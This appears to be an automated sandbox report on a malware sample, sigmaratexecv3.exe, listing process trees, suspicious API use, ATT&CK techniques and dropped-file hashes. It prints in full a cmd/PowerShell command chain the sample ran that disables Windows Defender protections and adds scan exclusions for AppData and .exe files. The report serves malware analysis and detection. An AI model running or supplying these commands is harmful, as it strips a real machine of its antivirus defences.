Token: SeCreatePagefilePrivilege	1476	chrome.exe
Token: SeShutdownPrivilege	1476	chrome.exe
Token: SeCreatePagefilePrivilege	1476	chrome.exe
Token: SeShutdownPrivilege	1476	chrome.exe
Token: SeCreatePagefilePrivilege	1476	chrome.exe
Token: SeShutdownPrivilege	1476	chrome.exe
Token: SeCreatePagefilePrivilege	1476	chrome.exe
Token: SeShutdownPrivilege	1476	chrome.exe
Token: SeCreatePagefilePrivilege	1476	chrome.exe
Token: SeShutdownPrivilege	1476	chrome.exe
Token: SeCreatePagefilePrivilege	1476	chrome.exe
Token: SeShutdownPrivilege	1476	chrome.exe
Token: SeCreatePagefilePrivilege	1476	chrome.exe
Token: SeShutdownPrivilege	1476	chrome.exe
Token: SeCreatePagefilePrivilege	1476	chrome.exe
Token: SeShutdownPrivilege	1476	chrome.exe
Token: SeCreatePagefilePrivilege	1476	chrome.exe
Token: SeShutdownPrivilege	1476	chrome.exe
Token: SeCreatePagefilePrivilege	1476	chrome.exe
Token: SeShutdownPrivilege	1476	chrome.exe
Token: SeCreatePagefilePrivilege	1476	chrome.exe
Token: SeShutdownPrivilege	1476	chrome.exe
Token: SeCreatePagefilePrivilege	1476	chrome.exe
Token: SeShutdownPrivilege	1476	chrome.exe

Suspicious use of FindShellTrayWindow 44 IoCs

pid	Process
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
4408	msiexec.exe
4408	msiexec.exe
2996	msiexec.exe
2996	msiexec.exe
1476	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe
1476	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 208 wrote to memory of 1664	208	sigmaratexecv3.exe	84
PID 208 wrote to memory of 1664	208	sigmaratexecv3.exe	84
PID 1664 wrote to memory of 3592	1664	sigmaratexecv3.exe	88
PID 1664 wrote to memory of 3592	1664	sigmaratexecv3.exe	88
PID 3592 wrote to memory of 2860	3592	cmd.exe	90
PID 3592 wrote to memory of 2860	3592	cmd.exe	90
PID 1476 wrote to memory of 2196	1476	chrome.exe	93
PID 1476 wrote to memory of 2196	1476	chrome.exe	93
PID 3592 wrote to memory of 2228	3592	cmd.exe	94
PID 3592 wrote to memory of 2228	3592	cmd.exe	94
PID 3592 wrote to memory of 1676	3592	cmd.exe	95
PID 3592 wrote to memory of 1676	3592	cmd.exe	95
PID 1476 wrote to memory of 1984	1476	chrome.exe	96
PID 1476 wrote to memory of 1984	1476	chrome.exe	96
PID 1476 wrote to memory of 1984	1476	chrome.exe	96
PID 1476 wrote to memory of 1984	1476	chrome.exe	96
PID 1476 wrote to memory of 1984	1476	chrome.exe	96
PID 1476 wrote to memory of 1984	1476	chrome.exe	96
PID 1476 wrote to memory of 1984	1476	chrome.exe	96
PID 1476 wrote to memory of 1984	1476	chrome.exe	96
PID 1476 wrote to memory of 1984	1476	chrome.exe	96
PID 1476 wrote to memory of 1984	1476	chrome.exe	96
PID 1476 wrote to memory of 1984	1476	chrome.exe	96
PID 1476 wrote to memory of 1984	1476	chrome.exe	96
PID 1476 wrote to memory of 1984	1476	chrome.exe	96
PID 1476 wrote to memory of 1984	1476	chrome.exe	96
PID 1476 wrote to memory of 1984	1476	chrome.exe	96
PID 1476 wrote to memory of 1984	1476	chrome.exe	96
PID 1476 wrote to memory of 1984	1476	chrome.exe	96
PID 1476 wrote to memory of 1984	1476	chrome.exe	96
PID 1476 wrote to memory of 1984	1476	chrome.exe	96
PID 1476 wrote to memory of 1984	1476	chrome.exe	96
PID 1476 wrote to memory of 1984	1476	chrome.exe	96
PID 1476 wrote to memory of 1984	1476	chrome.exe	96
PID 1476 wrote to memory of 1984	1476	chrome.exe	96
PID 1476 wrote to memory of 1984	1476	chrome.exe	96
PID 1476 wrote to memory of 1984	1476	chrome.exe	96
PID 1476 wrote to memory of 1984	1476	chrome.exe	96
PID 1476 wrote to memory of 1984	1476	chrome.exe	96
PID 1476 wrote to memory of 1984	1476	chrome.exe	96
PID 1476 wrote to memory of 1984	1476	chrome.exe	96
PID 1476 wrote to memory of 1984	1476	chrome.exe	96
PID 1476 wrote to memory of 1984	1476	chrome.exe	96
PID 1476 wrote to memory of 1112	1476	chrome.exe	97
PID 1476 wrote to memory of 1112	1476	chrome.exe	97
PID 1476 wrote to memory of 5056	1476	chrome.exe	98
PID 1476 wrote to memory of 5056	1476	chrome.exe	98
PID 1476 wrote to memory of 5056	1476	chrome.exe	98
PID 1476 wrote to memory of 5056	1476	chrome.exe	98
PID 1476 wrote to memory of 5056	1476	chrome.exe	98
PID 1476 wrote to memory of 5056	1476	chrome.exe	98
PID 1476 wrote to memory of 5056	1476	chrome.exe	98
PID 1476 wrote to memory of 5056	1476	chrome.exe	98
PID 1476 wrote to memory of 5056	1476	chrome.exe	98
PID 1476 wrote to memory of 5056	1476	chrome.exe	98
PID 1476 wrote to memory of 5056	1476	chrome.exe	98
PID 1476 wrote to memory of 5056	1476	chrome.exe	98
PID 1476 wrote to memory of 5056	1476	chrome.exe	98
PID 1476 wrote to memory of 5056	1476	chrome.exe	98
PID 1476 wrote to memory of 5056	1476	chrome.exe	98
PID 1476 wrote to memory of 5056	1476	chrome.exe	98
PID 1476 wrote to memory of 5056	1476	chrome.exe	98
PID 1476 wrote to memory of 5056	1476	chrome.exe	98
PID 1476 wrote to memory of 5056	1476	chrome.exe	98

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\sigmaratexecv3.exe
"C:\Users\Admin\AppData\Local\Temp\sigmaratexecv3.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:208
- C:\Users\Admin\AppData\Local\Temp\sigmaratexecv3.exe
  "C:\Users\Admin\AppData\Local\Temp\sigmaratexecv3.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3592
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2860
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2228
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1676
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4476

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1476
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc10e0ab58,0x7ffc10e0ab68,0x7ffc10e0ab78
  2⤵
  PID:2196
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1608 --field-trial-handle=1988,i,1301788585067936123,7009428144212428154,131072 /prefetch:2
  2⤵
  PID:1984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1988,i,1301788585067936123,7009428144212428154,131072 /prefetch:8
  2⤵
  PID:1112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2264 --field-trial-handle=1988,i,1301788585067936123,7009428144212428154,131072 /prefetch:8
  2⤵
  PID:5056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3084 --field-trial-handle=1988,i,1301788585067936123,7009428144212428154,131072 /prefetch:1
  2⤵
  PID:4992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3104 --field-trial-handle=1988,i,1301788585067936123,7009428144212428154,131072 /prefetch:1
  2⤵
  PID:1748
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3620 --field-trial-handle=1988,i,1301788585067936123,7009428144212428154,131072 /prefetch:1
  2⤵
  PID:4496
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3908 --field-trial-handle=1988,i,1301788585067936123,7009428144212428154,131072 /prefetch:8
  2⤵
  PID:4000
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4560 --field-trial-handle=1988,i,1301788585067936123,7009428144212428154,131072 /prefetch:8
  2⤵
  PID:1064
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4764 --field-trial-handle=1988,i,1301788585067936123,7009428144212428154,131072 /prefetch:8
  2⤵
  PID:4652
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4868 --field-trial-handle=1988,i,1301788585067936123,7009428144212428154,131072 /prefetch:8
  2⤵
  PID:4924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4524 --field-trial-handle=1988,i,1301788585067936123,7009428144212428154,131072 /prefetch:8
  2⤵
  PID:2636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4500 --field-trial-handle=1988,i,1301788585067936123,7009428144212428154,131072 /prefetch:1
  2⤵
  PID:1304
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4488 --field-trial-handle=1988,i,1301788585067936123,7009428144212428154,131072 /prefetch:1
  2⤵
  PID:752
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5060 --field-trial-handle=1988,i,1301788585067936123,7009428144212428154,131072 /prefetch:1
  2⤵
  PID:1848
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1724 --field-trial-handle=1988,i,1301788585067936123,7009428144212428154,131072 /prefetch:8
  2⤵
  PID:2548
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5272 --field-trial-handle=1988,i,1301788585067936123,7009428144212428154,131072 /prefetch:8
  2⤵
  PID:3900
- C:\Windows\System32\msiexec.exe
  "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\python-3.1.2.amd64.msi"
  2⤵
  - Blocklisted process makes network request
  - Enumerates connected drives
  - Suspicious use of FindShellTrayWindow
  PID:4408
- C:\Windows\System32\msiexec.exe
  "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\python-3.1.2.amd64.msi"
  2⤵
  - Blocklisted process makes network request
  - Enumerates connected drives
  - Suspicious use of FindShellTrayWindow
  PID:2996

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:4932

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:4072
- C:\Windows\System32\MsiExec.exe
  C:\Windows\System32\MsiExec.exe -Embedding 46FAC755C373A7071C5F2BEF68DFBC70 C
  2⤵
  - Loads dropped DLL
  PID:4292
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:4176
- C:\Windows\System32\MsiExec.exe
  C:\Windows\System32\MsiExec.exe -Embedding 58143254BC17468F4A22968F0FDCC647
  2⤵
  - Loads dropped DLL
  PID:1524
- C:\Windows\System32\MsiExec.exe
  C:\Windows\System32\MsiExec.exe -Embedding 1DAEDD357A1702BF6959AFE7029F6108 C
  2⤵
  - Loads dropped DLL
  PID:3444
- C:\Windows\System32\MsiExec.exe
  C:\Windows\System32\MsiExec.exe -Embedding BBF8BEA9718FFBD687898435707E44C9
  2⤵
  - Loads dropped DLL
  PID:3340

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
PID:1748

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:448

C:\Users\Admin\Desktop\sigmaratexecv3.exe
"C:\Users\Admin\Desktop\sigmaratexecv3.exe"
1⤵
PID:2080
- C:\Users\Admin\Desktop\sigmaratexecv3.exe
  "C:\Users\Admin\Desktop\sigmaratexecv3.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:1344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "
    3⤵
    PID:3008
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4616
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3612
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4860
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1792

C:\Users\Admin\Desktop\sigmaratexecv3.exe
"C:\Users\Admin\Desktop\sigmaratexecv3.exe"
1⤵
PID:220
- C:\Users\Admin\Desktop\sigmaratexecv3.exe
  "C:\Users\Admin\Desktop\sigmaratexecv3.exe"
  2⤵
  PID:1676

C:\Users\Admin\Desktop\sigmaratexecv3.exe
"C:\Users\Admin\Desktop\sigmaratexecv3.exe"
1⤵
PID:312
- C:\Users\Admin\Desktop\sigmaratexecv3.exe
  "C:\Users\Admin\Desktop\sigmaratexecv3.exe"
  2⤵
  PID:4300

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e5887ec.rbs

Filesize
161KB

MD5
572a1900cdc85a9a6800a3f642837e9a

SHA1
e18d9455186cf206cdc074b866ffd1edb02c2333

SHA256
763a72bc78ba56c1f54bc92c9ff6ddcbcb2316491e3abcea21b9c9449417183a

SHA512
51774855876d5108bbdea38d047bc7163610285249a836ed9d4888ffb07caba2680246a270115b55b1c1e401187cfce80ec7f2e8686aea9dd01c9fed740844d0

Download Submit
C:\Python31\Lib\http\__init__.py

Filesize
39B

MD5
f8259102dfc36d919a899cdb8fde48ce

SHA1
4510c766809835dab814c25c2223009eb33e633a

SHA256
52069aeefb58dad898781d8bde183ffda18faae11f17ace8ce83368cab863fb1

SHA512
a77c8a67c95d49e353f903e3bd394e343c0dfa633dcffbfd7c1b34d5e1bdfb9a372ece71360812e44c5c5badfa0fc81387a6f65f96616d6307083c2b3bb0213f

Download Submit
C:\Python31\Lib\lib2to3\fixes\__init__.py

Filesize
48B

MD5
3d02598f327c3159a8be45fd28daac9b

SHA1
78bd4ccb31f7984b68a96a9f2d0d78c27857b091

SHA256
b36ae7da13e8cafa693b64b57c6afc4511da2f9bbc10d0ac03667fca0f288214

SHA512
c59c5b77a0cf85bb9fbf46f9541c399a9f739f84828c311ced6e270854ecce86d266e4c8d5aa07897b48ce995c3da29fea994e8cd017d48e5a4fab7a6b65e903

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C3948BE6E525B8A8CEE9FAC91C9E392_5BF173F919C349702A43826F965B70AC

Filesize
5B

MD5
5bfa51f3a417b98e7443eca90fc94703

SHA1
8c015d80b8a23f780bdd215dc842b0f5551f63bd

SHA256
bebe2853a3485d1c2e5c5be4249183e0ddaff9f87de71652371700a89d937128

SHA512
4cd03686254bb28754cbaa635ae1264723e2be80ce1dd0f78d1ab7aee72232f5b285f79e488e9c5c49ff343015bd07bb8433d6cee08ae3cea8c317303e3ac399

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
480B

MD5
a685252fa5d367e0508952eb8db8d03b

SHA1
df064f8913ad9423f407dbcad08cfb5532609054

SHA256
ea919ff360e098f2a1615deaae51b84490770e8a6e1c7e0498e2314fca3e8eaa

SHA512
0dfc6aa38c9747f6646498ebe2aa7ed3651e8b401922332a0d9fbae381829d8db95b5ed23b67deff1263df4faf4c330ebc436bfcdd2d7fed86a0ee244f324d9c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
ecf9e7052f366aaf6633ea5027e9ab37

SHA1
560386840cded4f47440c5b08148c93a0c8104bb

SHA256
3b5b87e6022caa50170c1b5a594060d3dd56fc37ece632e5d6af159b02f4615d

SHA512
ee1816d38dc8253dc31bfe8380f9ba975f36c94839859e94862be82e265d0aab606494d4b183a934209890477bf7d5702453ed244e51b01d88048f965ea1181d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
f261c35505e0e6cc54269bfb81310321

SHA1
9e852d50d731e94a089f2f903f1cd8806ddcd7eb

SHA256
673f452f06d003a444f3db69dba77cb466fe51e95dccda7e0d4731287b35bf5b

SHA512
8cbf4fe42e464e3ae610cf602a19086d48975c163e2cd351b831286132cba01e662a001a7ff77f71cca260438d22af6c73299adb8e3e833ac89f9ba7cc5fb645

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
7c6199ff5b0dfa10e2606c146170e0cb

SHA1
a5a0e76c9533bfd75476a5802869dc53aba60cf1

SHA256
5dd3025ea2b0b572c31f5efcf0146502f4641408f6a91dfac672146df9414fe3

SHA512
bb918fa9dfda0f7544f0db96aca3b977e8e212d33dfb10222e5501cb0d2688effc60a0e25fb671ff4aac90fcc646dc3e9132136072b8398779c5b6994d190c75

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
f62fb81b589eeef13993786128f69792

SHA1
e39932e5b55a0826dae41636309c595d9e5efb16

SHA256
2f329a7245f463719824bfd57131d1edd7f16bcc93d22ccde4d0f13f351fc600

SHA512
eede68fb476826c934a36ec42b84475f4da9d28954a70a7eb59b1afb99b95116ca82e6c05bb129c8218a28d24f417598776279c007265ef1ec9aef64e6319830

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
97fdcc0283b52f16153a7dd851bcc5fa

SHA1
cce472b33389c558edd5dd8c15220be159943fde

SHA256
731f9d8b8794f61f7ed134f090f978dae625c8894068fb8457e1f923c653f824

SHA512
35db9fdd2fc3bbae71a0b2a3f6c096fd8dbf77ddeaf09679a373972f46857468a7e796587242a82a99b2ca64a120a7b34f824a9f1af93908139c18f4bed399e4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
bfb80571585da85d98f5b781efa5d6c5

SHA1
31d3ba6ded941238def34a3afd4cb30a55fb299a

SHA256
2cfd311ac1235786b9ba7198abcb44cc5b24fded02af8d83a14e7324b9087a65

SHA512
5706da0a5ffb52926e19e88ac5f279111686faf1f6d55ac533ad4c2c1b64b369ab20a9c45f84dca5f33e32da9d9b9d95c21e70ec6ffce3821474c79eaeb8c9de

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
4bd11f44666e95f8db46c81f0f629c7d

SHA1
da675f2340186c6055ea972128c258fbde6a1c3a

SHA256
0264410c6f7577236321d84b6877c3addbcc4396426ad13eb6069bcde2cfdeb5

SHA512
99399185cbcc5341aa0c9cbbdd10843aa65322803b54e7d1cf0b00c276bf43914cdea136361887e18cefa2d3f1c47a895c5d6c1434087cb8e55121f41182d4c2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
003ac718c3066d82cd930b204879cd7b

SHA1
9718231f64a41384a6905d8533f471e4dc89a284

SHA256
f405109b02ab273a81403b7d220b1ee5499f0408305af120155c585127f74f58

SHA512
1f03bc25c768e828fe2bc0fb50b1b1ea44a0fca0e82f899743b4b8fd4f84033e5b30389bd21b43b545b00d9dd4714685c0a8995e79010dc042d0887b90f7e25a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
21d5ea86edb2e3932b990652791cb9c4

SHA1
eb4ccac0cac9b81458a0cff735bf90442c63f9e9

SHA256
426093aa3809a02dce60487dcd761fe878af825e6bf5e32ebd0cf1fcb4ce3239

SHA512
60a945799fd3b0a187d372e6d93438f90042952a12ed4b04b48cf7d0d1b5550ee7f9e5ff91d1f3b55cd0dee87421e2f93f855ee3bde367e75f3c0935518e9a06

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
1ddb53b612ea5a5866170dea75739d12

SHA1
6212ce7ecf9f57a7c19465c658915db9ec30d6e7

SHA256
